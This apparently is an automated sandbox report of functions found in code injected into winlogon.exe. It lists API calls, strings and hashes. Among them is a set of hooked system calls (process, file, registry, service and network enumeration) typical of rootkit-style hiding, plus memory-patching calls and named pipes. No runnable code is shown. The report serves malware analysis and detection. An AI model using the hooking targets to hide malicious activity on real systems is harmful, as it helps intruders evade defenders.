Function 000001E8589B5B30 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001E8589B5B6B
GetThreadContext.KERNEL32 ref: 000001E8589B5CD5

Part of subcall function 000001E8589B5960: GetCurrentThreadId.KERNEL32 ref: 000001E8589B5964

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
Instruction ID: 5d1d641fdfe7a921bc40b2274792ee65e942fd43df3d51391b1333f61c708ac4
Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
Instruction Fuzzy Hash: 06D18976219B88C6DB709B46E49439EB7A1F7C8B85F100227EE8D47BA5DF38C551CB40

Function 000001E8589B50D0 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001E8589B5156

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
Instruction ID: 540203665ef2c2292df768c22022c8278d109779f1dd1d0b06d3c86d73575d79
Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
Instruction Fuzzy Hash: 1302A53622DBC4CAEB60CB55E49439EF7A1F784795F104126EA8E87BA9DF78C454CB00

Function 000001E8589B39E0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000001E8589B3A66
VirtualAlloc.KERNEL32 ref: 000001E8589B3AA0

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
Instruction ID: 09cf3f19013970cc5edba0ff51850c5c12277f20bdc89c750177569444b008a5
Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
Instruction Fuzzy Hash: BC31F13222DAC4C9EA70DA15E45539EF6E4FB88785F200536E9CD46BA9DF7CC5409B04

Function 000001E8589B328C Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001E8589B32AE
PathFindFileNameW.SHLWAPI ref: 000001E8589B32BD

Part of subcall function 000001E8589B3844: StrCmpNIW.SHLWAPI ref: 000001E8589B385C

Part of subcall function 000001E8589B3790: GetModuleHandleW.KERNEL32 ref: 000001E8589B379E
Part of subcall function 000001E8589B3790: GetCurrentProcess.KERNEL32 ref: 000001E8589B37CC
Part of subcall function 000001E8589B3790: VirtualProtectEx.KERNEL32 ref: 000001E8589B37EE
Part of subcall function 000001E8589B3790: GetCurrentProcess.KERNEL32 ref: 000001E8589B3809
Part of subcall function 000001E8589B3790: VirtualProtectEx.KERNEL32 ref: 000001E8589B382A

CreateThread.KERNEL32 ref: 000001E8589B330B

Part of subcall function 000001E8589B1D14: GetCurrentThread.KERNEL32 ref: 000001E8589B1D1F

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction ID: d7f8704d464420a2ce37a06b3bc325ee32576ad6341c0f5012ed89367f689b04
Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction Fuzzy Hash: 431180306386C1CAFB60EB62F9493DEF2D4AF54346F94413F9D0E81595EF79D4449600

Function 000001E8589B4DF0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000001E8589B4DF4
VirtualProtect.KERNEL32 ref: 000001E8589B4E37
FlushInstructionCache.KERNEL32 ref: 000001E8589B4E4C

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
Instruction ID: 22019e5aebe169b3d70db300553c4eca4bdb0326af0d5ecbc3d97933e7c21ec8
Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
Instruction Fuzzy Hash: 50F0BD76228A84C5D6309B45E45179EFBA1EB88BE5F144126BE8D47B69CE38C5908B40

Function 000001E85898273C Relevance: 3.2, APIs: 2, Instructions: 187
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000001E8589827DB
LoadLibraryA.KERNELBASE ref: 000001E85898285E

Memory Dump Source

Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: 54f6f79a6e3174aa67926fcea571029873fefd45f025aae229484734b2b22b08
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: B461DD32B21692CBDB548F95D2007ADF3A2FB54BA4F588136DE5E07788DE39D852CB00

Function 000001E8589B1ABC Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001E8589B1628: GetProcessHeap.KERNEL32 ref: 000001E8589B1633
Part of subcall function 000001E8589B1628: HeapAlloc.KERNEL32 ref: 000001E8589B1642
Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B16B2
Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B16DF
Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B16F9
Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1719
Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B1734
Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1754
Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B176F
Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B178F
Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B17AA
Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B17CA

Sleep.KERNEL32 ref: 000001E8589B1AD7
SleepEx.KERNELBASE ref: 000001E8589B1ADD

Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B17E5
Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1805
Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B1820
Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1840
Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B185B
Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B187B
Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B1896
Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B18A0

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction ID: 06e8169f9804a98201475c8f763f238f1302acfb2d082d9a4a6838d138c42db4
Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction Fuzzy Hash: 9C31F9712296D5CAEB54BB66DA453FDB3A8AF84BC2F1454339E0D8729AFE20C8518210

Non-executed Functions

Function 000001E8589B2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001E8589B2BD0
lstrlenW.KERNEL32 ref: 000001E8589B2E0A

Part of subcall function 000001E8589B199C: OpenProcess.KERNEL32 ref: 000001E8589B19C2
Part of subcall function 000001E8589B199C: K32GetModuleFileNameExW.KERNEL32 ref: 000001E8589B19E0
Part of subcall function 000001E8589B199C: PathFindFileNameW.SHLWAPI ref: 000001E8589B19EF
Part of subcall function 000001E8589B199C: lstrlenW.KERNEL32 ref: 000001E8589B19FB
Part of subcall function 000001E8589B199C: StrCpyW.SHLWAPI ref: 000001E8589B1A0E
Part of subcall function 000001E8589B199C: CloseHandle.KERNEL32 ref: 000001E8589B1A1C

GetProcAddress.KERNEL32 ref: 000001E8589B2BE5

Part of subcall function 000001E8589B152C: StrCmpIW.SHLWAPI ref: 000001E8589B155D

Part of subcall function 000001E8589B3844: StrCmpNIW.SHLWAPI ref: 000001E8589B385C

StrCmpNIW.SHLWAPI ref: 000001E8589B2C28
lstrlenW.KERNEL32 ref: 000001E8589B2D50

Strings

NtQueryObject, xrefs: 000001E8589B2BDB
ntdll.dll, xrefs: 000001E8589B2BC9
\Device\Nsi, xrefs: 000001E8589B2C1B

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction ID: 66d3cc7fa703628ffd88a958204c6c3eae92163f900264158483d38a9f943711
Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction Fuzzy Hash: 31B14732228AD0CAEBA59FA6D8507EDF3A5FB84B86F445027EE0D57B94DE75C840C740

Function 000001E8589B7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001E8589B7DAC
RtlCaptureContext.NTDLL ref: 000001E8589B7DD9
RtlLookupFunctionEntry.NTDLL ref: 000001E8589B7DF3
RtlVirtualUnwind.NTDLL ref: 000001E8589B7E34
IsDebuggerPresent.KERNEL32 ref: 000001E8589B7E88
SetUnhandledExceptionFilter.KERNEL32 ref: 000001E8589B7EA9
UnhandledExceptionFilter.KERNEL32 ref: 000001E8589B7EB4

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction ID: d4e1efc638050b926f9574cf9333cc024f10501de906563db633245b72e59a7c
Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction Fuzzy Hash: 6C313B76229BC0DAEB609F60E8807EDB764FB84745F44452ADE4E57B98EF38C648C710

Function 000001E8589BD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001E8589BD31D
RtlLookupFunctionEntry.NTDLL ref: 000001E8589BD335
RtlVirtualUnwind.NTDLL ref: 000001E8589BD370
IsDebuggerPresent.KERNEL32 ref: 000001E8589BD3A9
SetUnhandledExceptionFilter.KERNEL32 ref: 000001E8589BD3B3
UnhandledExceptionFilter.KERNEL32 ref: 000001E8589BD3BE

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction ID: fe4fedf686d99ec42a62814e82a9535f6f48c61b48166fa88bd6cf84dd123d16
Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction Fuzzy Hash: D4314E36224BC0DAEB649F25E8403EEB7A4FB89755F50012AEE9D53B55DF38C545CB00

Function 000001E8589B12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001E8589B1319
GetProcessHeap.KERNEL32 ref: 000001E8589B1327
HeapAlloc.KERNEL32 ref: 000001E8589B1338
RegEnumValueW.ADVAPI32 ref: 000001E8589B1397

Part of subcall function 000001E8589B152C: StrCmpIW.SHLWAPI ref: 000001E8589B155D

GetProcessHeap.KERNEL32 ref: 000001E8589B13DF
HeapAlloc.KERNEL32 ref: 000001E8589B13ED
GetProcessHeap.KERNEL32 ref: 000001E8589B140A
HeapFree.KERNEL32 ref: 000001E8589B1418
lstrlenW.KERNEL32 ref: 000001E8589B1421
GetProcessHeap.KERNEL32 ref: 000001E8589B142F
HeapAlloc.KERNEL32 ref: 000001E8589B143D
StrCpyW.SHLWAPI ref: 000001E8589B145F
GetProcessHeap.KERNEL32 ref: 000001E8589B1476
HeapFree.KERNEL32 ref: 000001E8589B1484

Strings

d, xrefs: 000001E8589B135A

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction ID: c7e4212cc5d13ccfdc5b6c4001ea65b39e9a5bd1eb85d2e12a93a934f0025c5e
Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction Fuzzy Hash: 83512B76224BC4CAEB55DF62E54439EBBA1FB89B96F04413ADE4907758DF39C0458700

Function 000001E8589B1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001E8589B1D1F

Part of subcall function 000001E8589B1FD4: GetModuleHandleA.KERNEL32 ref: 000001E8589B1FEC
Part of subcall function 000001E8589B1FD4: GetProcAddress.KERNEL32 ref: 000001E8589B1FFD

Part of subcall function 000001E8589B5B30: GetCurrentThreadId.KERNEL32 ref: 000001E8589B5B6B

Strings

NtEnumerateKey, xrefs: 000001E8589B1DB9
EnumServiceGroupW, xrefs: 000001E8589B1DF0
sechost.dll, xrefs: 000001E8589B1E39
EnumServicesStatusExW, xrefs: 000001E8589B1E11, 000001E8589B1E32
ntdll.dll, xrefs: 000001E8589B1D2D
advapi32.dll, xrefs: 000001E8589B1DF7, 000001E8589B1E18
NtResumeThread, xrefs: 000001E8589B1D62
NtQuerySystemInformation, xrefs: 000001E8589B1D45
NtEnumerateValueKey, xrefs: 000001E8589B1DD6
NtQueryDirectoryFile, xrefs: 000001E8589B1D7F
NtDeviceIoControlFile, xrefs: 000001E8589B1E56
NtQueryDirectoryFileEx, xrefs: 000001E8589B1D9C

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction ID: 307e4caf8f773ededbd49a1d779e4008e5bf6fc61e17ee7f67eba446ce0af824
Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction Fuzzy Hash: B131A274535ACAE4EA05EFA5EC527ECF720FF84346F8040739C1D125669F79864AC750

Function 000001E858986910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001E858986938
__scrt_acquire_startup_lock.LIBCMT ref: 000001E85898698A
_RTC_Initialize.LIBCMT ref: 000001E8589869B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001E8589869DE
__scrt_release_startup_lock.LIBCMT ref: 000001E858986A09

Strings

`eh vector vbase copy constructor iterator', xrefs: 000001E8589869EE
`dynamic initializer for ', xrefs: 000001E8589869C7
scriptor', xrefs: 000001E858986B39, 000001E858986BB2, 000001E858986BEC
`eh vector copy constructor iterator', xrefs: 000001E858986A3B

Memory Dump Source

Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
API String ID: 190073905-1786718095
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 2273416eda205a835de9ccd1b838d3f7d5380a1bbd2954953cf4568a5117860d
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: D6819F317342C3CAFA929B65D8493DEF291AF85780F5480379E4D8B796DF39C9458B00

Function 000001E8589BCE28 Relevance: 18.1, APIs: 12, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 000001E8589BCE37
FlsGetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCE4C
FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCE6D
FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCE9A
FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCEAB
FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCEBC
SetLastError.KERNEL32 ref: 000001E8589BCED7
FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF0D
FlsSetValue.KERNEL32(?,?,00000001,000001E8589BECCC,?,?,?,?,000001E8589BBF9F,?,?,?,?,?,000001E8589B7AB0), ref: 000001E8589BCF2C

Part of subcall function 000001E8589BD6CC: HeapAlloc.KERNEL32 ref: 000001E8589BD721

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF54

Part of subcall function 000001E8589BD744: HeapFree.KERNEL32 ref: 000001E8589BD75A
Part of subcall function 000001E8589BD744: GetLastError.KERNEL32 ref: 000001E8589BD764

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF65
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF76

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction ID: 3c490d6acf1992e320168de973d9926605ee64eeb61e54e48ecf7625888e2c93
Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction Fuzzy Hash: A4416D312292C4CEFA68B771D5953FDF2425F857BAF14477BAC3E076E6DE2888018640

Function 000001E8589B2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001E8589B2259
GetCurrentProcessId.KERNEL32 ref: 000001E8589B2263

Part of subcall function 000001E8589B1934: OpenProcess.KERNEL32 ref: 000001E8589B1952
Part of subcall function 000001E8589B1934: IsWow64Process.KERNEL32 ref: 000001E8589B1968
Part of subcall function 000001E8589B1934: CloseHandle.KERNEL32 ref: 000001E8589B1983

CreateFileW.KERNEL32 ref: 000001E8589B22BC
WriteFile.KERNEL32 ref: 000001E8589B22E4
ReadFile.KERNEL32 ref: 000001E8589B2303
CloseHandle.KERNEL32 ref: 000001E8589B230C

Strings

\\.\pipe\dialerchildproc64, xrefs: 000001E8589B228C
\\.\pipe\dialerchildproc32, xrefs: 000001E8589B2293

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction ID: 1b119e999e0377ff32fa6a01d0b90dd197b3e79e90bf9ddc32d83b8a008cc649
Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction Fuzzy Hash: BB211036624680C6F710DB25F4443ADB7A1FB85BA5F504226DE5E02AA8DF7DC549CB00

Function 000001E858989944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001E8589899A1

Part of subcall function 000001E85898A814: __GetUnwindTryBlock.LIBCMT ref: 000001E85898A857
Part of subcall function 000001E85898A814: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001E85898A87C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001E858989A79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001E858989CCE
std::bad_alloc::bad_alloc.LIBCMT ref: 000001E858989DDA

Strings

csm, xrefs: 000001E8589899BB
csm, xrefs: 000001E858989A22
csm, xrefs: 000001E858989A9C

Memory Dump Source

Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction ID: 482f2ed3bbf1a5d302b22c37c74437017ab2248bb16c1b938e4fd7d10152e2c4
Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction Fuzzy Hash: B6E17E72624B82CAEB60DF65D4813DDB7A4FB55B98F100126EE8E57B9ACF34C491CB01

Function 000001E8589BA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001E8589BA5A1

Part of subcall function 000001E8589BB414: __GetUnwindTryBlock.LIBCMT ref: 000001E8589BB457
Part of subcall function 000001E8589BB414: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001E8589BB47C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001E8589BA679
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001E8589BA8CE
std::bad_alloc::bad_alloc.LIBCMT ref: 000001E8589BA9DA

Strings

csm, xrefs: 000001E8589BA622
csm, xrefs: 000001E8589BA69C
csm, xrefs: 000001E8589BA5BB

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction ID: 456ede5cd129e004dcad9625f83eba4cfeb6527c6b4e1311171347c7d4774ba3
Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction Fuzzy Hash: 87E15972A29B84CAEB609F69D4803DDB7E0FB55B99F100126EE8D57B9ADF34C481C701

Function 000001E8589BF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 000001E8589BF510
GetProcAddress.KERNEL32 ref: 000001E8589BF51C

Strings

api-ms-, xrefs: 000001E8589BF45A
ext-ms-, xrefs: 000001E8589BF46D

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
